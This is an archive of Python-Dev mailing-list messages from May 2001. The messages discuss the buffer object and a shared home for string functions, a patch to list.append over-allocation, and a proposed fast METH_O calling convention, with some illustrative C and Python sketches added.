Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <3B0E5C50.6E365F69@STScI.Edu>

"M.-A. Lemburg" wrote:
> 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> >
> > You're totally missing the point with that suggestion. It does *not*
> > suffice to add them to buffer objects. What about array objects? mmap
> > objects?  Random Joe Object who implements the buffer interface?
> 
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

Sounds like you are trying to make the buffer object into something it
is not. Not that I have the foggiest idea what it is now, since it
hasn't much use and is badly broken.

I like your idea of sharing functions, I just don't think the buffer
object is the proper means.  I think the buffer object should be
removed from Python and something better put in its place. (I'm not
talking about the buffer C/API, though this could also use an
overhaul, since it doesn't provide enough information to the receiving
method.)

What I think we need is:

1) a malloc object which has a similar interface to the mmap object
with access protection, etc.  This object would be the fundamental way
of getting memory.  The string object would use it to allocate a chunk
of 'read-only' memory.  Other objects would then know not to modify
the contents of the memory.  If you wanted a reference or view of the
memory/buffer, you would get a reference to this object.

2) objects supporting the buffer object should provide a view method
which returns a copy of themselves (and hence all their methods) and
can be used to get a pointer to a subset of its memory.  In this way
the type of memory/buffer being accessed is known compared to the
current buffer object which only indicates the buffer is binary or
char data.  In essence, information about how the buffer should be used
is lost in the current buffer C/API.
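
[Point (2) is roughly what Python 3's memoryview (PEP 3118) later provided: a view that records the element format and whether the memory is read-only, and that can be sliced without copying. A short sketch using array.array:]

```python
from array import array

doubles = array("d", [1.0, 2.0, 3.0])
view = memoryview(doubles)
print(view.format, view.itemsize, view.readonly)   # d 8 False
print(view[1])                                     # 2.0

tail = view[1:]      # a view of a subset of the memory, no copy made
tail[0] = 20.0       # writes through to the underlying array
print(doubles[1])                                  # 20.0

print(memoryview(b"abc").readonly)                 # True: bytes are immutable
```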

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From guido at digicool.com  Fri May 25 16:29:28 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 25 May 2001 10:29:28 -0400
Subject: [Python-Dev] Vacation
Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com>

I will be on vacation next week without net access.  Back on June 4th!

There's a bunch of stuff that happened on the mailing list that I
expect I won't get to -- I've got to finish up some high priority
work for Digital Creations before I can leave.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May 25 21:06:16 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 25 May 2001 15:06:16 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>

c.l.py has rediscovered the quadratic-time worst-case behavior of
list.append().  That is, do list.append(x) in a long loop.  Linux users
don't see anything particularly bad no matter how big the loop.  WinNT
eventually displays clear quadratic-time behavior.  Win9x dies
surprisingly early with a MemoryError, despite gobs of memory free:
turns out Win9x allocates hundreds of virtual heaps, isn't able to
coalesce them, and you actually run out of *address space* (the whole
2GB user space gets fragmented beyond hope).  People on other platforms
have reported other bad behaviors over the years.

I don't want to argue about this again <wink>, I just want to know
whether the patch below slows anything down on your oddball box.  It
increases the over-allocation amount in several more layers.  It also
replaces integer * and / in the over-allocation computation with bit
operations (integer / in particular is very slow on *some* boxes).

Long-term we should teach PyMalloc about Python's realloc() abuses and
craft a cooperative solution.

Index: Objects/listobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v
retrieving revision 2.92
diff -c -r2.92 listobject.c
*** Objects/listobject.c	2001/02/12 22:06:02	2.92
--- Objects/listobject.c	2001/05/25 19:04:07
***************
*** 9,24 ****
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, PyTryBlock) \
! 	((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock))

  static int
  roundupsize(int n)
  {
! 	if (n < 500)
  		return ROUNDUP(n, 10);
  	else
! 		return ROUNDUP(n, 100);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
--- 9,30 ----
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, nbits) \
! 	( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) )

  static int
  roundupsize(int n)
  {
! 	if ((n >> 9) == 0)
! 		return ROUNDUP(n, 3);
! 	else if ((n >> 13) == 0)
! 		return ROUNDUP(n, 7);
! 	else if ((n >> 17) == 0)
  		return ROUNDUP(n, 10);
+ 	else if ((n >> 20) == 0)
+ 		return ROUNDUP(n, 13);
  	else
! 		return ROUNDUP(n, 18);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
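
To see what the patch changes, here is a small standalone C sketch that transcribes both versions of roundupsize() (the original macro's second parameter is renamed for readability) and counts how often the requested allocation size changes while a list grows one append at a time. count_size_changes() is a hypothetical helper added only for this illustration; treating each change in requested size as a realloc() that may have to move the array is an assumption about allocator behavior, not a measurement.

```c
#include <assert.h>

/* Old scheme (revision 2.92): multiple of 10 below 500 items,
   multiple of 100 above that.  Uses integer / and *. */
#define ROUNDUP_DIV(n, unit) ((((n) + (unit) - 1) / (unit)) * (unit))

static int roundupsize_old(int n)
{
    if (n < 500)
        return ROUNDUP_DIV(n, 10);
    else
        return ROUNDUP_DIV(n, 100);
}

/* New scheme from the patch: round up to a multiple of 2**nbits using
   shifts only; the granularity grows with the size of the list. */
#define ROUNDUP_SHIFT(n, nbits) \
    ( ((n) + (1 << (nbits)) - 1) >> (nbits) << (nbits) )

static int roundupsize_new(int n)
{
    if ((n >> 9) == 0)          /* n < 512: multiple of 8 */
        return ROUNDUP_SHIFT(n, 3);
    else if ((n >> 13) == 0)    /* n < 8192: multiple of 128 */
        return ROUNDUP_SHIFT(n, 7);
    else if ((n >> 17) == 0)    /* n < 131072: multiple of 1024 */
        return ROUNDUP_SHIFT(n, 10);
    else if ((n >> 20) == 0)    /* n < 1048576: multiple of 8192 */
        return ROUNDUP_SHIFT(n, 13);
    else                        /* otherwise: multiple of 262144 */
        return ROUNDUP_SHIFT(n, 18);
}

/* Hypothetical helper: count how often the requested size changes
   while a list grows from 0 to n items, one append at a time. */
static long count_size_changes(int (*roundup)(int), int n)
{
    long changes = 0;
    int prev = roundup(0);
    assert(n >= 0);
    for (int k = 1; k <= n; k++) {
        int cur = roundup(k);
        if (cur != prev)
            changes++;
        prev = cur;
    }
    return changes;
}
```

With these definitions, count_size_changes(roundupsize_old, 1000000) is 10045 and count_size_changes(roundupsize_new, 1000000) is 351. The old fixed step of 100 makes the number of size changes grow linearly with the final length; the new tiers raise the step as the list grows, cutting that count by a large constant factor.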


From martin at loewis.home.cs.tu-berlin.de  Fri May 25 21:51:26 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 21:51:26 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com>
Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>

> Now this would be more flexible if you would implement a scheme
> which lets us put the parser string into the method list. The
> call mechanism could then easily figure out how to call the
> method and it would also be more easily extensible:
> 
>  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

I'd like to hear other people's comments on this specific issue, so I
guess I should probably write a PEP outlining the options.

My immediate reaction to your proposal is that it only complicates the
interface without any savings. We still can only support a limited
number of calling conventions. E.g. it is not possible to write
portable C code that does all the calling conventions for "l", "ll",
"lll", "llll", and so on - you have to cast the function pointer to
the right prototype, which must be done in source code.

So with this interface, you may end up at run-time finding out that
you cannot support the signature. With the current patch, you'd have
to know to convert "OO" into METH_OO, which I think is not too much to
ask - and it gives you a compile-time error if you use an unsupported
calling convention.
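
The point about casting can be illustrated with a minimal C sketch in which every name is hypothetical: Obj stands in for PyObject, CALL_O/CALL_OO for METH_O/METH_OO, and MethodDef for PyMethodDef. The table stores one generic function-pointer type, and the dispatcher must convert it back to the exact prototype before calling, so each supported convention is a separately written case. A table entry naming a flag such as CALL_OOO that was never defined fails to compile, whereas a format string stored in the table could only be rejected when the dispatcher meets it at run time.

```c
#include <assert.h>
#include <stddef.h>

/* Stand-in for PyObject; all names in this sketch are hypothetical. */
typedef struct Obj { long value; } Obj;

/* The single pointer type stored in the table (compare PyCFunction). */
typedef void (*generic_fn)(void);

/* One real prototype per supported calling convention. */
typedef Obj *(*fn_O)(Obj *self, Obj *a);
typedef Obj *(*fn_OO)(Obj *self, Obj *a, Obj *b);

enum { CALL_O, CALL_OO };

typedef struct {
    const char *name;
    generic_fn  func;
    int         flags;   /* records which prototype func really has */
} MethodDef;

/* Convert the stored pointer back to its real type before calling.
   Each convention is its own case, written out in source code. */
static Obj *call_method(const MethodDef *m, Obj *self, Obj **args, int nargs)
{
    assert(m != NULL && self != NULL);
    switch (m->flags) {
    case CALL_O:
        if (nargs != 1)
            return NULL;          /* wrong argument count */
        return ((fn_O)m->func)(self, args[0]);
    case CALL_OO:
        if (nargs != 2)
            return NULL;
        return ((fn_OO)m->func)(self, args[0], args[1]);
    default:
        return NULL;              /* unknown flag value */
    }
}

/* Two example methods, one per convention. */
static Obj result_slot;

static Obj *meth_add(Obj *self, Obj *a)
{
    result_slot.value = self->value + a->value;
    return &result_slot;
}

static Obj *meth_add2(Obj *self, Obj *a, Obj *b)
{
    result_slot.value = self->value + a->value + b->value;
    return &result_slot;
}

static const MethodDef methods[] = {
    {"add",  (generic_fn)meth_add,  CALL_O},
    {"add2", (generic_fn)meth_add2, CALL_OO},
};
```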

> A parser marker "OO" would then call a method like this:
> 
>  method(self, arg0, arg1)
> 
> and so on.

That is indeed the plan, but since you have to code the parameter
combinations in C code, you can only support so many of them.

> allows implementing a generic scheme which
> then again relies on PyArg_ParseTuple() to do the argument
> parsing, e.g. "is#" could be implemented as:

The point of the patch is to get rid of PyArg_ParseTuple in the
"common case". For functions with complex calling conventions, getting
rid of the PyArg_ParseTuple string parsing is not that important,
since they are expensive, anyway (not that "is#" couldn't be
supported, I'd call it METH_is_hash).

> For optional arguments we'd need some convention which then
> lets the called function add the default value as needed.

For the moment, I'd only support "|O", and perhaps "|z"; an omitted
argument would be represented as a NULL pointer. That means that "|i"
couldn't participate in the fast calling convention - unless we
translate that to

void foo(PyObject*self, int i, bool ipresent);

BTW, the most frequent function in my measurements that would make use
of this convention is "OO|i:replace", which scores at 4.5%.

Regards,
Martin


From gstein at lyra.org  Fri May 25 22:27:52 2001
From: gstein at lyra.org (Greg Stein)
Date: Fri, 25 May 2001 13:27:52 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu>
Message-ID: <20010525132752.B5402@lyra.org>

On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote:
> "M.-A. Lemburg" wrote:
> > 
> > > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > > Then you could write: buffer(ob).find('.').
> > >
> > > You're totally missing the point with that suggestion. It does *not*
> > > suffice to add them to buffer objects. What about array objects? mmap
> > > objects?  Random Joe Object who implements the buffer interface?
> > 
> > That's the point: you can wrap all those into a buffer object
> > and then use the buffer object methods to manipulate them. In
> > that sense, buffer objects provide an adaptor to the underlying
> > object which implements the needed methods.
> 
> Sounds like you are trying to make the buffer object into something it
> is not.

The buffer object is intended to provide a Python-level object (with methods
and behavior) for any other object which exports the buffer API (but not
those particular methods/behavior).

It was added for Python 1.5.2, but did not keep up with the methods added to
the string object. Arguably, it is out of date rather than "[turning it
into] something it is not."

> Not that I have the foggiest idea what it is now, since it
> hasn't seen much use and is badly broken.

"badly" is overstating the problem. It caches a pointer when it shouldn't.
This doesn't work well when using it with array objects or PIL's image
objects. For most objects, it is fine.

The buffer object is also very good for C/Python extensions and embedding
code. It provides a Python-level view on a block of memory. Using a string
object implies making a copy, and it removes the possibility for read/write
access to that memory.

And you state: "Not that I have the foggiest idea what it is now". If so,
then wtf are you making statements about the buffer object's behavior?

> I like your idea of sharing functions, I just don't think the buffer
> object is the proper means.  I think the buffer object should be
> removed from Python and something better put in its place. (I'm not
> talking about the buffer C/API, though this could also use an
> overhaul, since it doesn't provide enough information to the receiving
> method.)
> 
> What I think we need is:
> 
> 1) a malloc object which has a similar interface to the mmap object
> with access protection, etc.  This object would be the fundamental way
> of getting memory.  The string object would use it to allocate a chunk
> of 'read-only' memory.  Other objects would then know not to modify
> the contents of the memory.  If you wanted a reference or view of the
> memory/buffer, you would get a reference to this object.

You're talking about the buffer object that we have *today*.

It can refer to another object (i.e. the memory exposed via the other
object's buffer API), refer to memory, or it can allocate its own memory.
The buffer object can be marked read-only, or read-write.

> 2) objects supporting the buffer object should provide a view method
> which returns a copy of themselves (and hence all their methods) and
> can be used to get a pointer to a subset of its memory.  In this way
> the type of memory/buffer being accessed is known compared to the
> current buffer object which only indicates the buffer is binary or
> char data.  In essence information about how the buffer should be used
> is lost in the current buffer C/API.

I'm not sure that I understand this paragraph.


No... what needs to happen is to have the bug in PyBufferObject fixed. Then
to refactor stringobject.c and stropmodule.c to move all of those
byte-oriented processing functions into a new file such as Python/byteops.c
(whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
would be simple covers over the same functions.

Those functions can then be used by PyBufferObject to implement the rest of
the string methods on itself.


This would leave us at MAL's suggested point: via the buffer object, we can
perform all of the standard string methods/ops on any object that implements
the buffer API.
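
A minimal sketch of that refactoring, assuming hypothetical names (byteops_find(), StrObj and BufView are illustrative, not existing CPython code): the shared routine sees only a pointer and a length, and both a string-like object that owns its bytes and a buffer-like view onto someone else's memory become thin covers over it.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical shared helper in the spirit of "Python/byteops.c":
   it works on a pointer and a length, never on an object layout.
   Returns the index of the first occurrence of sub, or -1. */
static ptrdiff_t byteops_find(const char *s, size_t len,
                              const char *sub, size_t sublen)
{
    assert(s != NULL && sub != NULL);
    if (sublen == 0)
        return 0;
    if (sublen > len)
        return -1;
    for (size_t i = 0; i + sublen <= len; i++) {
        if (s[i] == sub[0] && memcmp(s + i, sub, sublen) == 0)
            return (ptrdiff_t)i;
    }
    return -1;
}

/* Hypothetical covers: a string-like object owning its bytes, and a
   buffer-like view onto memory owned by another object. */
typedef struct { size_t size; char data[64]; } StrObj;
typedef struct { const char *ptr; size_t size; } BufView;

static ptrdiff_t str_find(const StrObj *s, const char *sub)
{
    return byteops_find(s->data, s->size, sub, strlen(sub));
}

static ptrdiff_t buf_find(const BufView *b, const char *sub)
{
    return byteops_find(b->ptr, b->size, sub, strlen(sub));
}
```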

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal at lemburg.com  Fri May 25 23:16:32 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:16:32 +0200
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>
Message-ID: <3B0ECBB0.6798F4AB@lemburg.com>

Tim Peters wrote:
> 
> Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

That's what I think too. There's really not much point in trying
to work around poor malloc() implementations when we've already
got the cure built into Python... I just wish Vladimir would 
resurface again to complete his great work (AFAIK, pymalloc still
has problems with threads).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 25 23:38:15 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:38:15 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
Message-ID: <3B0ED0C7.F1A665EA@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Now this would be more flexible if you would implement a scheme
> > which lets us put the parser string into the method list. The
> > call mechanism could then easily figure out how to call the
> > method and it would also be more easily extensible:
> >
> >  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},
> 
> I'd like to hear other people's comments on this specific issue, so I
> guess I should probably write a PEP outlining the options.
> 
> My immediate reaction to your proposal is that it only complicates the
> interface without any savings. We still can only support a limited
> number of calling conventions. E.g. it is not possible to write
> portable C code that does all the calling conventions for "l", "ll",
> "lll", "llll", and so on - you have to cast the function pointer to
> the right prototype, which must be done in source code.
>
> So with this interface, you may end up at run-time finding out that
> you cannot support the signature. With the current patch, you'd have
> to know to convert "OO" into METH_OO, which I think is not too much to
> ask - and it gives you a compile-time error if you use an unsupported
> calling convention.

True. It's unfortunate that C doesn't offer the reverse of
varargs.h...
 
> > A parser marker "OO" would then call a method like this:
> >
> >  method(self, arg0, arg1)
> >
> > and so on.
> 
> That is indeed the plan, but since you have to code the parameter
> combinations in C code, you can only support so many of them.
> 
> > allows implementing a generic scheme which
> > then again relies on PyArg_ParseTuple() to do the argument
> > parsing, e.g. "is#" could be implemented as:
> 
> The point of the patch is to get rid of PyArg_ParseTuple in the
> "common case". For functions with complex calling conventions, getting
> rid of the PyArg_ParseTuple string parsing is not that important,
> since they are expensive, anyway (not that "is#" couldn't be
> supported, I'd call it METH_is_hash).
> 
> > For optional arguments we'd need some convention which then
> > lets the called function add the default value as needed.
> 
> For the moment, I'd only support "|O", and perhaps "|z"; an omitted
> argument would be represented as a NULL pointer. That means that "|i"
> couldn't participate in the fast calling convention - unless we
> translate that to
> 
> void foo(PyObject*self, int i, bool ipresent);
> 
> BTW, the most frequent function in my measurements that would make use
> of this convention is "OO|i:replace", which scores at 4.5%.

I was thinking of using pointer indirection for this:

	foo(PyObject *self, int *i)

If i is given as argument, *i is set to the value, otherwise
i is set to NULL.
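
A minimal sketch of that pointer-indirection convention, with hypothetical names (Obj stands in for PyObject; effective_limit() and call_with_optional() are illustrative only): the caller passes the address of the parsed value when the optional argument is present and NULL when it is omitted, so presence and value travel in one parameter instead of a separate `bool ipresent` flag.

```c
#include <assert.h>
#include <stddef.h>

/* Stand-in for PyObject; all names here are hypothetical. */
typedef struct Obj { long value; } Obj;

/* Callee for an "|i"-style optional int: NULL means "not given". */
static int effective_limit(Obj *self, const int *count)
{
    assert(self != NULL);                 /* self is otherwise unused here */
    return count != NULL ? *count : -1;   /* -1 plays the default "no limit" */
}

/* Caller side: `given` says whether the optional argument was
   supplied; if so, its parsed value is passed by address. */
static int call_with_optional(Obj *self, int given, int parsed)
{
    return effective_limit(self, given ? &parsed : NULL);
}
```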



From tim.one at home.com  Sat May 26 00:11:43 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 25 May 2001 18:11:43 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEIMKEAA.tim.one@home.com>

[Tim]
> Long-term we should teach PyMalloc about Python's realloc()
> abuses and craft a cooperative solution.

[MAL]
> That's what I think too. There's really not much point in trying
> to work around poor malloc() implementations when we've already
> got the cure built into Python...

The point *here* is that a simple localized patch could kill off a
Frequently Irritating Complaint without further ado:  on my personal
cost/benefit scale, it's all I can *afford* to do now.  PyMalloc likely
won't solve it as-is x-platform, without new work to accommodate extreme
realloc() abuse.

> I just wish Vladimir would resurface again to complete his great
> work

I'd like him to come back even if he doesn't <wink>.

> (AFAIK, pymalloc still has problems with threads).

It has lock macros that haven't been #define'd to do anything yet.  But part
of the potential value of the Python core using its own allocator is to
exploit the global interpreter lock to *not* lock in the allocator.  Messy
issues.  Python should grow a cheaper platform-specific flavor of internal
lock too.  (Jeremy pointed out some code the other day that jumps through
hoops to simulate a reentrant lock on top of a Python lock; an irony is that
on Windows, the native lock *is* reentrant already, and Python jumps through
hoops to make it act as if it weren't <wink>)


From mal at lemburg.com  Sat May 26 00:07:00 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 00:07:00 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org>
Message-ID: <3B0ED784.FC53D01@lemburg.com>

Greg Stein wrote:
> 
> No... what needs to happen is to have the bug in PyBufferObject fixed. Then
> to refactor stringobject.c and stropmodule.c to move all of those
> byte-oriented processing functions into a new file such as Python/byteops.c
> (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
> would be simple covers over the same functions.
> 
> Those functions can then be used by PyBufferObject to implement the rest of
> the string methods on itself.
> 
> This would leave us at MAL's suggested point: via the buffer object, we can
> perform all of the standard string methods/ops on any object that implements
> the buffer API.

I wonder how we could achieve this without copy&pasting all
the needed methods from stringobject.c to bufferobject.c, since
all the string methods use the string object layout directly
rather than just dealing with a pointer and a length.



From m.favas at per.dem.csiro.au  Sat May 26 04:34:20 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 10:34:20 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au>

[Tim wants to know whether his patch to listobject.c slows anything down
on anyone's "oddball box"...]

While in no way admitting that mine is an oddball box <wink>, it being a
Tru64 Unix alpha processor machine, I do see a slowdown after applying
the patch (measured on the test suite and on pystone). However, it's
only of the order of 0.5 to 1%.

slightly-oddly y'rs  - Mark

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From tim.one at home.com  Sat May 26 06:05:40 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 00:05:40 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>

[Mark Favas]
> [Tim wants to know whether his patch to listobject.c slows anything down
> on anyone's "oddball box"...]
>
> While in no way admitting that mine is an oddball box <wink>,

Heh -- of course not.  I had more in mind obscure OSes like Linux <wink>.

> it being a Tru64 Unix alpha processor machine, I do see a slowdown
> after applying the patch (measured on the test suite and on pystone).
> However, it's only of the order of 0.5 to 1%.

Now that's very odd, since Alpha has about the slowest integer division on
Earth, and every list append was doing an int div before the patch but not
after.

I'm afraid that timing the test suite before and after is a red herring, as
several of the expensive tests have (pseudo)random components and can do an
amount of work that varies depending on system time at the time random.py is
first imported.

pystone is even odder:  the relevant code in listobject.c is never executed
during pystone!  I suspected that because pystone is an old synthetic Ada
benchmark simulating a pile of integer systems programs, so pystone is
unique among Python programs in not exercising any of Python's useful
features <wink> -- a breakpoint in the debugger just now confirmed it (never
did a list resize after compilation finished).

So I'm pretty sure that after I check it in, you'll see a speedup instead
<wink>.

Get anywhere identifying why your other app is 20% slower (blast from the
past)?


From martin at loewis.home.cs.tu-berlin.de  Sat May 26 07:28:32 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 26 May 2001 07:28:32 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com>
Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>

> I was thinking of using pointer indirection for this:
> 
> 	foo(PyObject *self, int *i)
> 
> If i is given as argument, *i is set to the value, otherwise
> i is set to NULL.

That is a good idea; I'll try to update my patch to support more
calling conventions.

Regards,
Martin


From tim.one at home.com  Sat May 26 08:44:04 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 02:44:04 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0ED784.FC53D01@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>

The buffer object has been neglected for years:  is that because it's in
prime shape, or because nobody cares about it enough to maintain it?  "The
bug" has been known for years without any action taken to address it; the
docs give up in spots and nobody addresses that either (like "The current
policy seems to state that these characters may be multi-byte characters" --
well, yes or no?); the builtin buffer() function isn't called anywhere in
the std test suite; the file object still has an undocumented readinto()
method that just confuses people who bump into it; and it's so obscure in
daily life that it appears Guido didn't even think of it when adding
iterators for the other sequence types.

I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
champion it now?  That would be cool.

About combining strop and buffers and strings, don't forget unicodeobject.c:
that's got oodles of basically duplicate code too.  /F suggested dealing
with the minor differences via maintaining one code file that gets compiled
multiple times w/ appropriate #defines.
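
Within a single file, the same idea can be sketched with a function-generating macro instead of re-including one source file under different #defines; the names DEFINE_COUNT, bytes_count(), ucs2_count() and the 16-bit ucs2_t type are hypothetical. The routine is written once, but each instantiation still compiles to its own function.

```c
#include <assert.h>
#include <stddef.h>

typedef unsigned short ucs2_t;   /* stand-in for a 16-bit Unicode code unit */

/* The shared "template": one definition of a count routine,
   parameterized by a name prefix and the character type. */
#define DEFINE_COUNT(PREFIX, CHAR_T)                                     \
    static size_t PREFIX##_count(const CHAR_T *s, size_t len, CHAR_T c) \
    {                                                                    \
        size_t n = 0;                                                    \
        assert(s != NULL || len == 0);                                   \
        for (size_t i = 0; i < len; i++)                                 \
            if (s[i] == c)                                               \
                n++;                                                     \
        return n;                                                        \
    }

DEFINE_COUNT(bytes, char)     /* 8-bit instance (string/strop/buffer) */
DEFINE_COUNT(ucs2, ucs2_t)    /* 16-bit instance (Unicode) */
```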


From tim.one at home.com  Sat May 26 10:14:06 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 04:14:06 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>

I don't want to see us duplicate the guts of PyArg_ParseTuple() inside
do_call_special().  METH_O is a cool idea, METH_l is marginal, and the new
code is already slower for METH_O than it needs to be in order to support
the *possibility* of METH_l too (stacks and loops and switch stmts and an
extra layer of do_call_special function call "just in case").

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend <wink>.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


From m.favas at per.dem.csiro.au  Sat May 26 10:30:29 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 16:30:29 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>
Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au>

[Tim tells Mark that his observations reflect more Brownian motion
(pseudo!) than reality...]

> [Mark Favas]
> > it being a Tru64 Unix alpha processor machine, I do see a slowdown
> > after applying the patch (measured on the test suite and on pystone).
> > However, it's only of the order of 0.5 to 1%.
> 
> Now that's very odd, since Alpha has about the slowest integer division on
> Earth, and every list append was doing an int div before the patch but not
> after.
> 
> I'm afraid that timing the test suite before and after is a red herring, as
> several of the expensive tests have (pseudo)random components and can do an
> amount of work that varies depending on system time at the time random.py is
> first imported.
> 
> pystone is even odder:  the relevant code in listobject.c is never executed
> during pystone!  I suspected that because pystone is an old synthetic Ada
> benchmark simulating a pile of integer systems programs, so pystone is
> unique among Python programs in not exercising any of Python's useful
> features <wink> -- a breakpoint in the debugger just now confirmed it (never
> did a list resize after compilation finished).
> 
> So I'm pretty sure that after I check it in, you'll see a speedup instead
> <wink>.

OK <grin>: this time, instead of making unwarranted assumptions about
test suites and pystones <wink>, I wrote and ran a test that I _think_
should exercise the code (at least, it does lots of list.append()s),
and, yes, the newly checked-in code's about 3-4% faster compared with
the original version of, well, days ago.

> 
> Get anywhere identifying why your other app is 20% slower (blast from the
> past)?

No, not yet. The profiling results at first eyeball seemed hard to match
up, so I put it off for a rainy weekend. And Perth's drought has just
broken... Will attempt to make sense of it. Interesting that Marc-Andre
seemed to get a somewhat similar slowdown between 1.5.2 and 2.0.



From mal at lemburg.com  Sat May 26 11:54:12 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 11:54:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
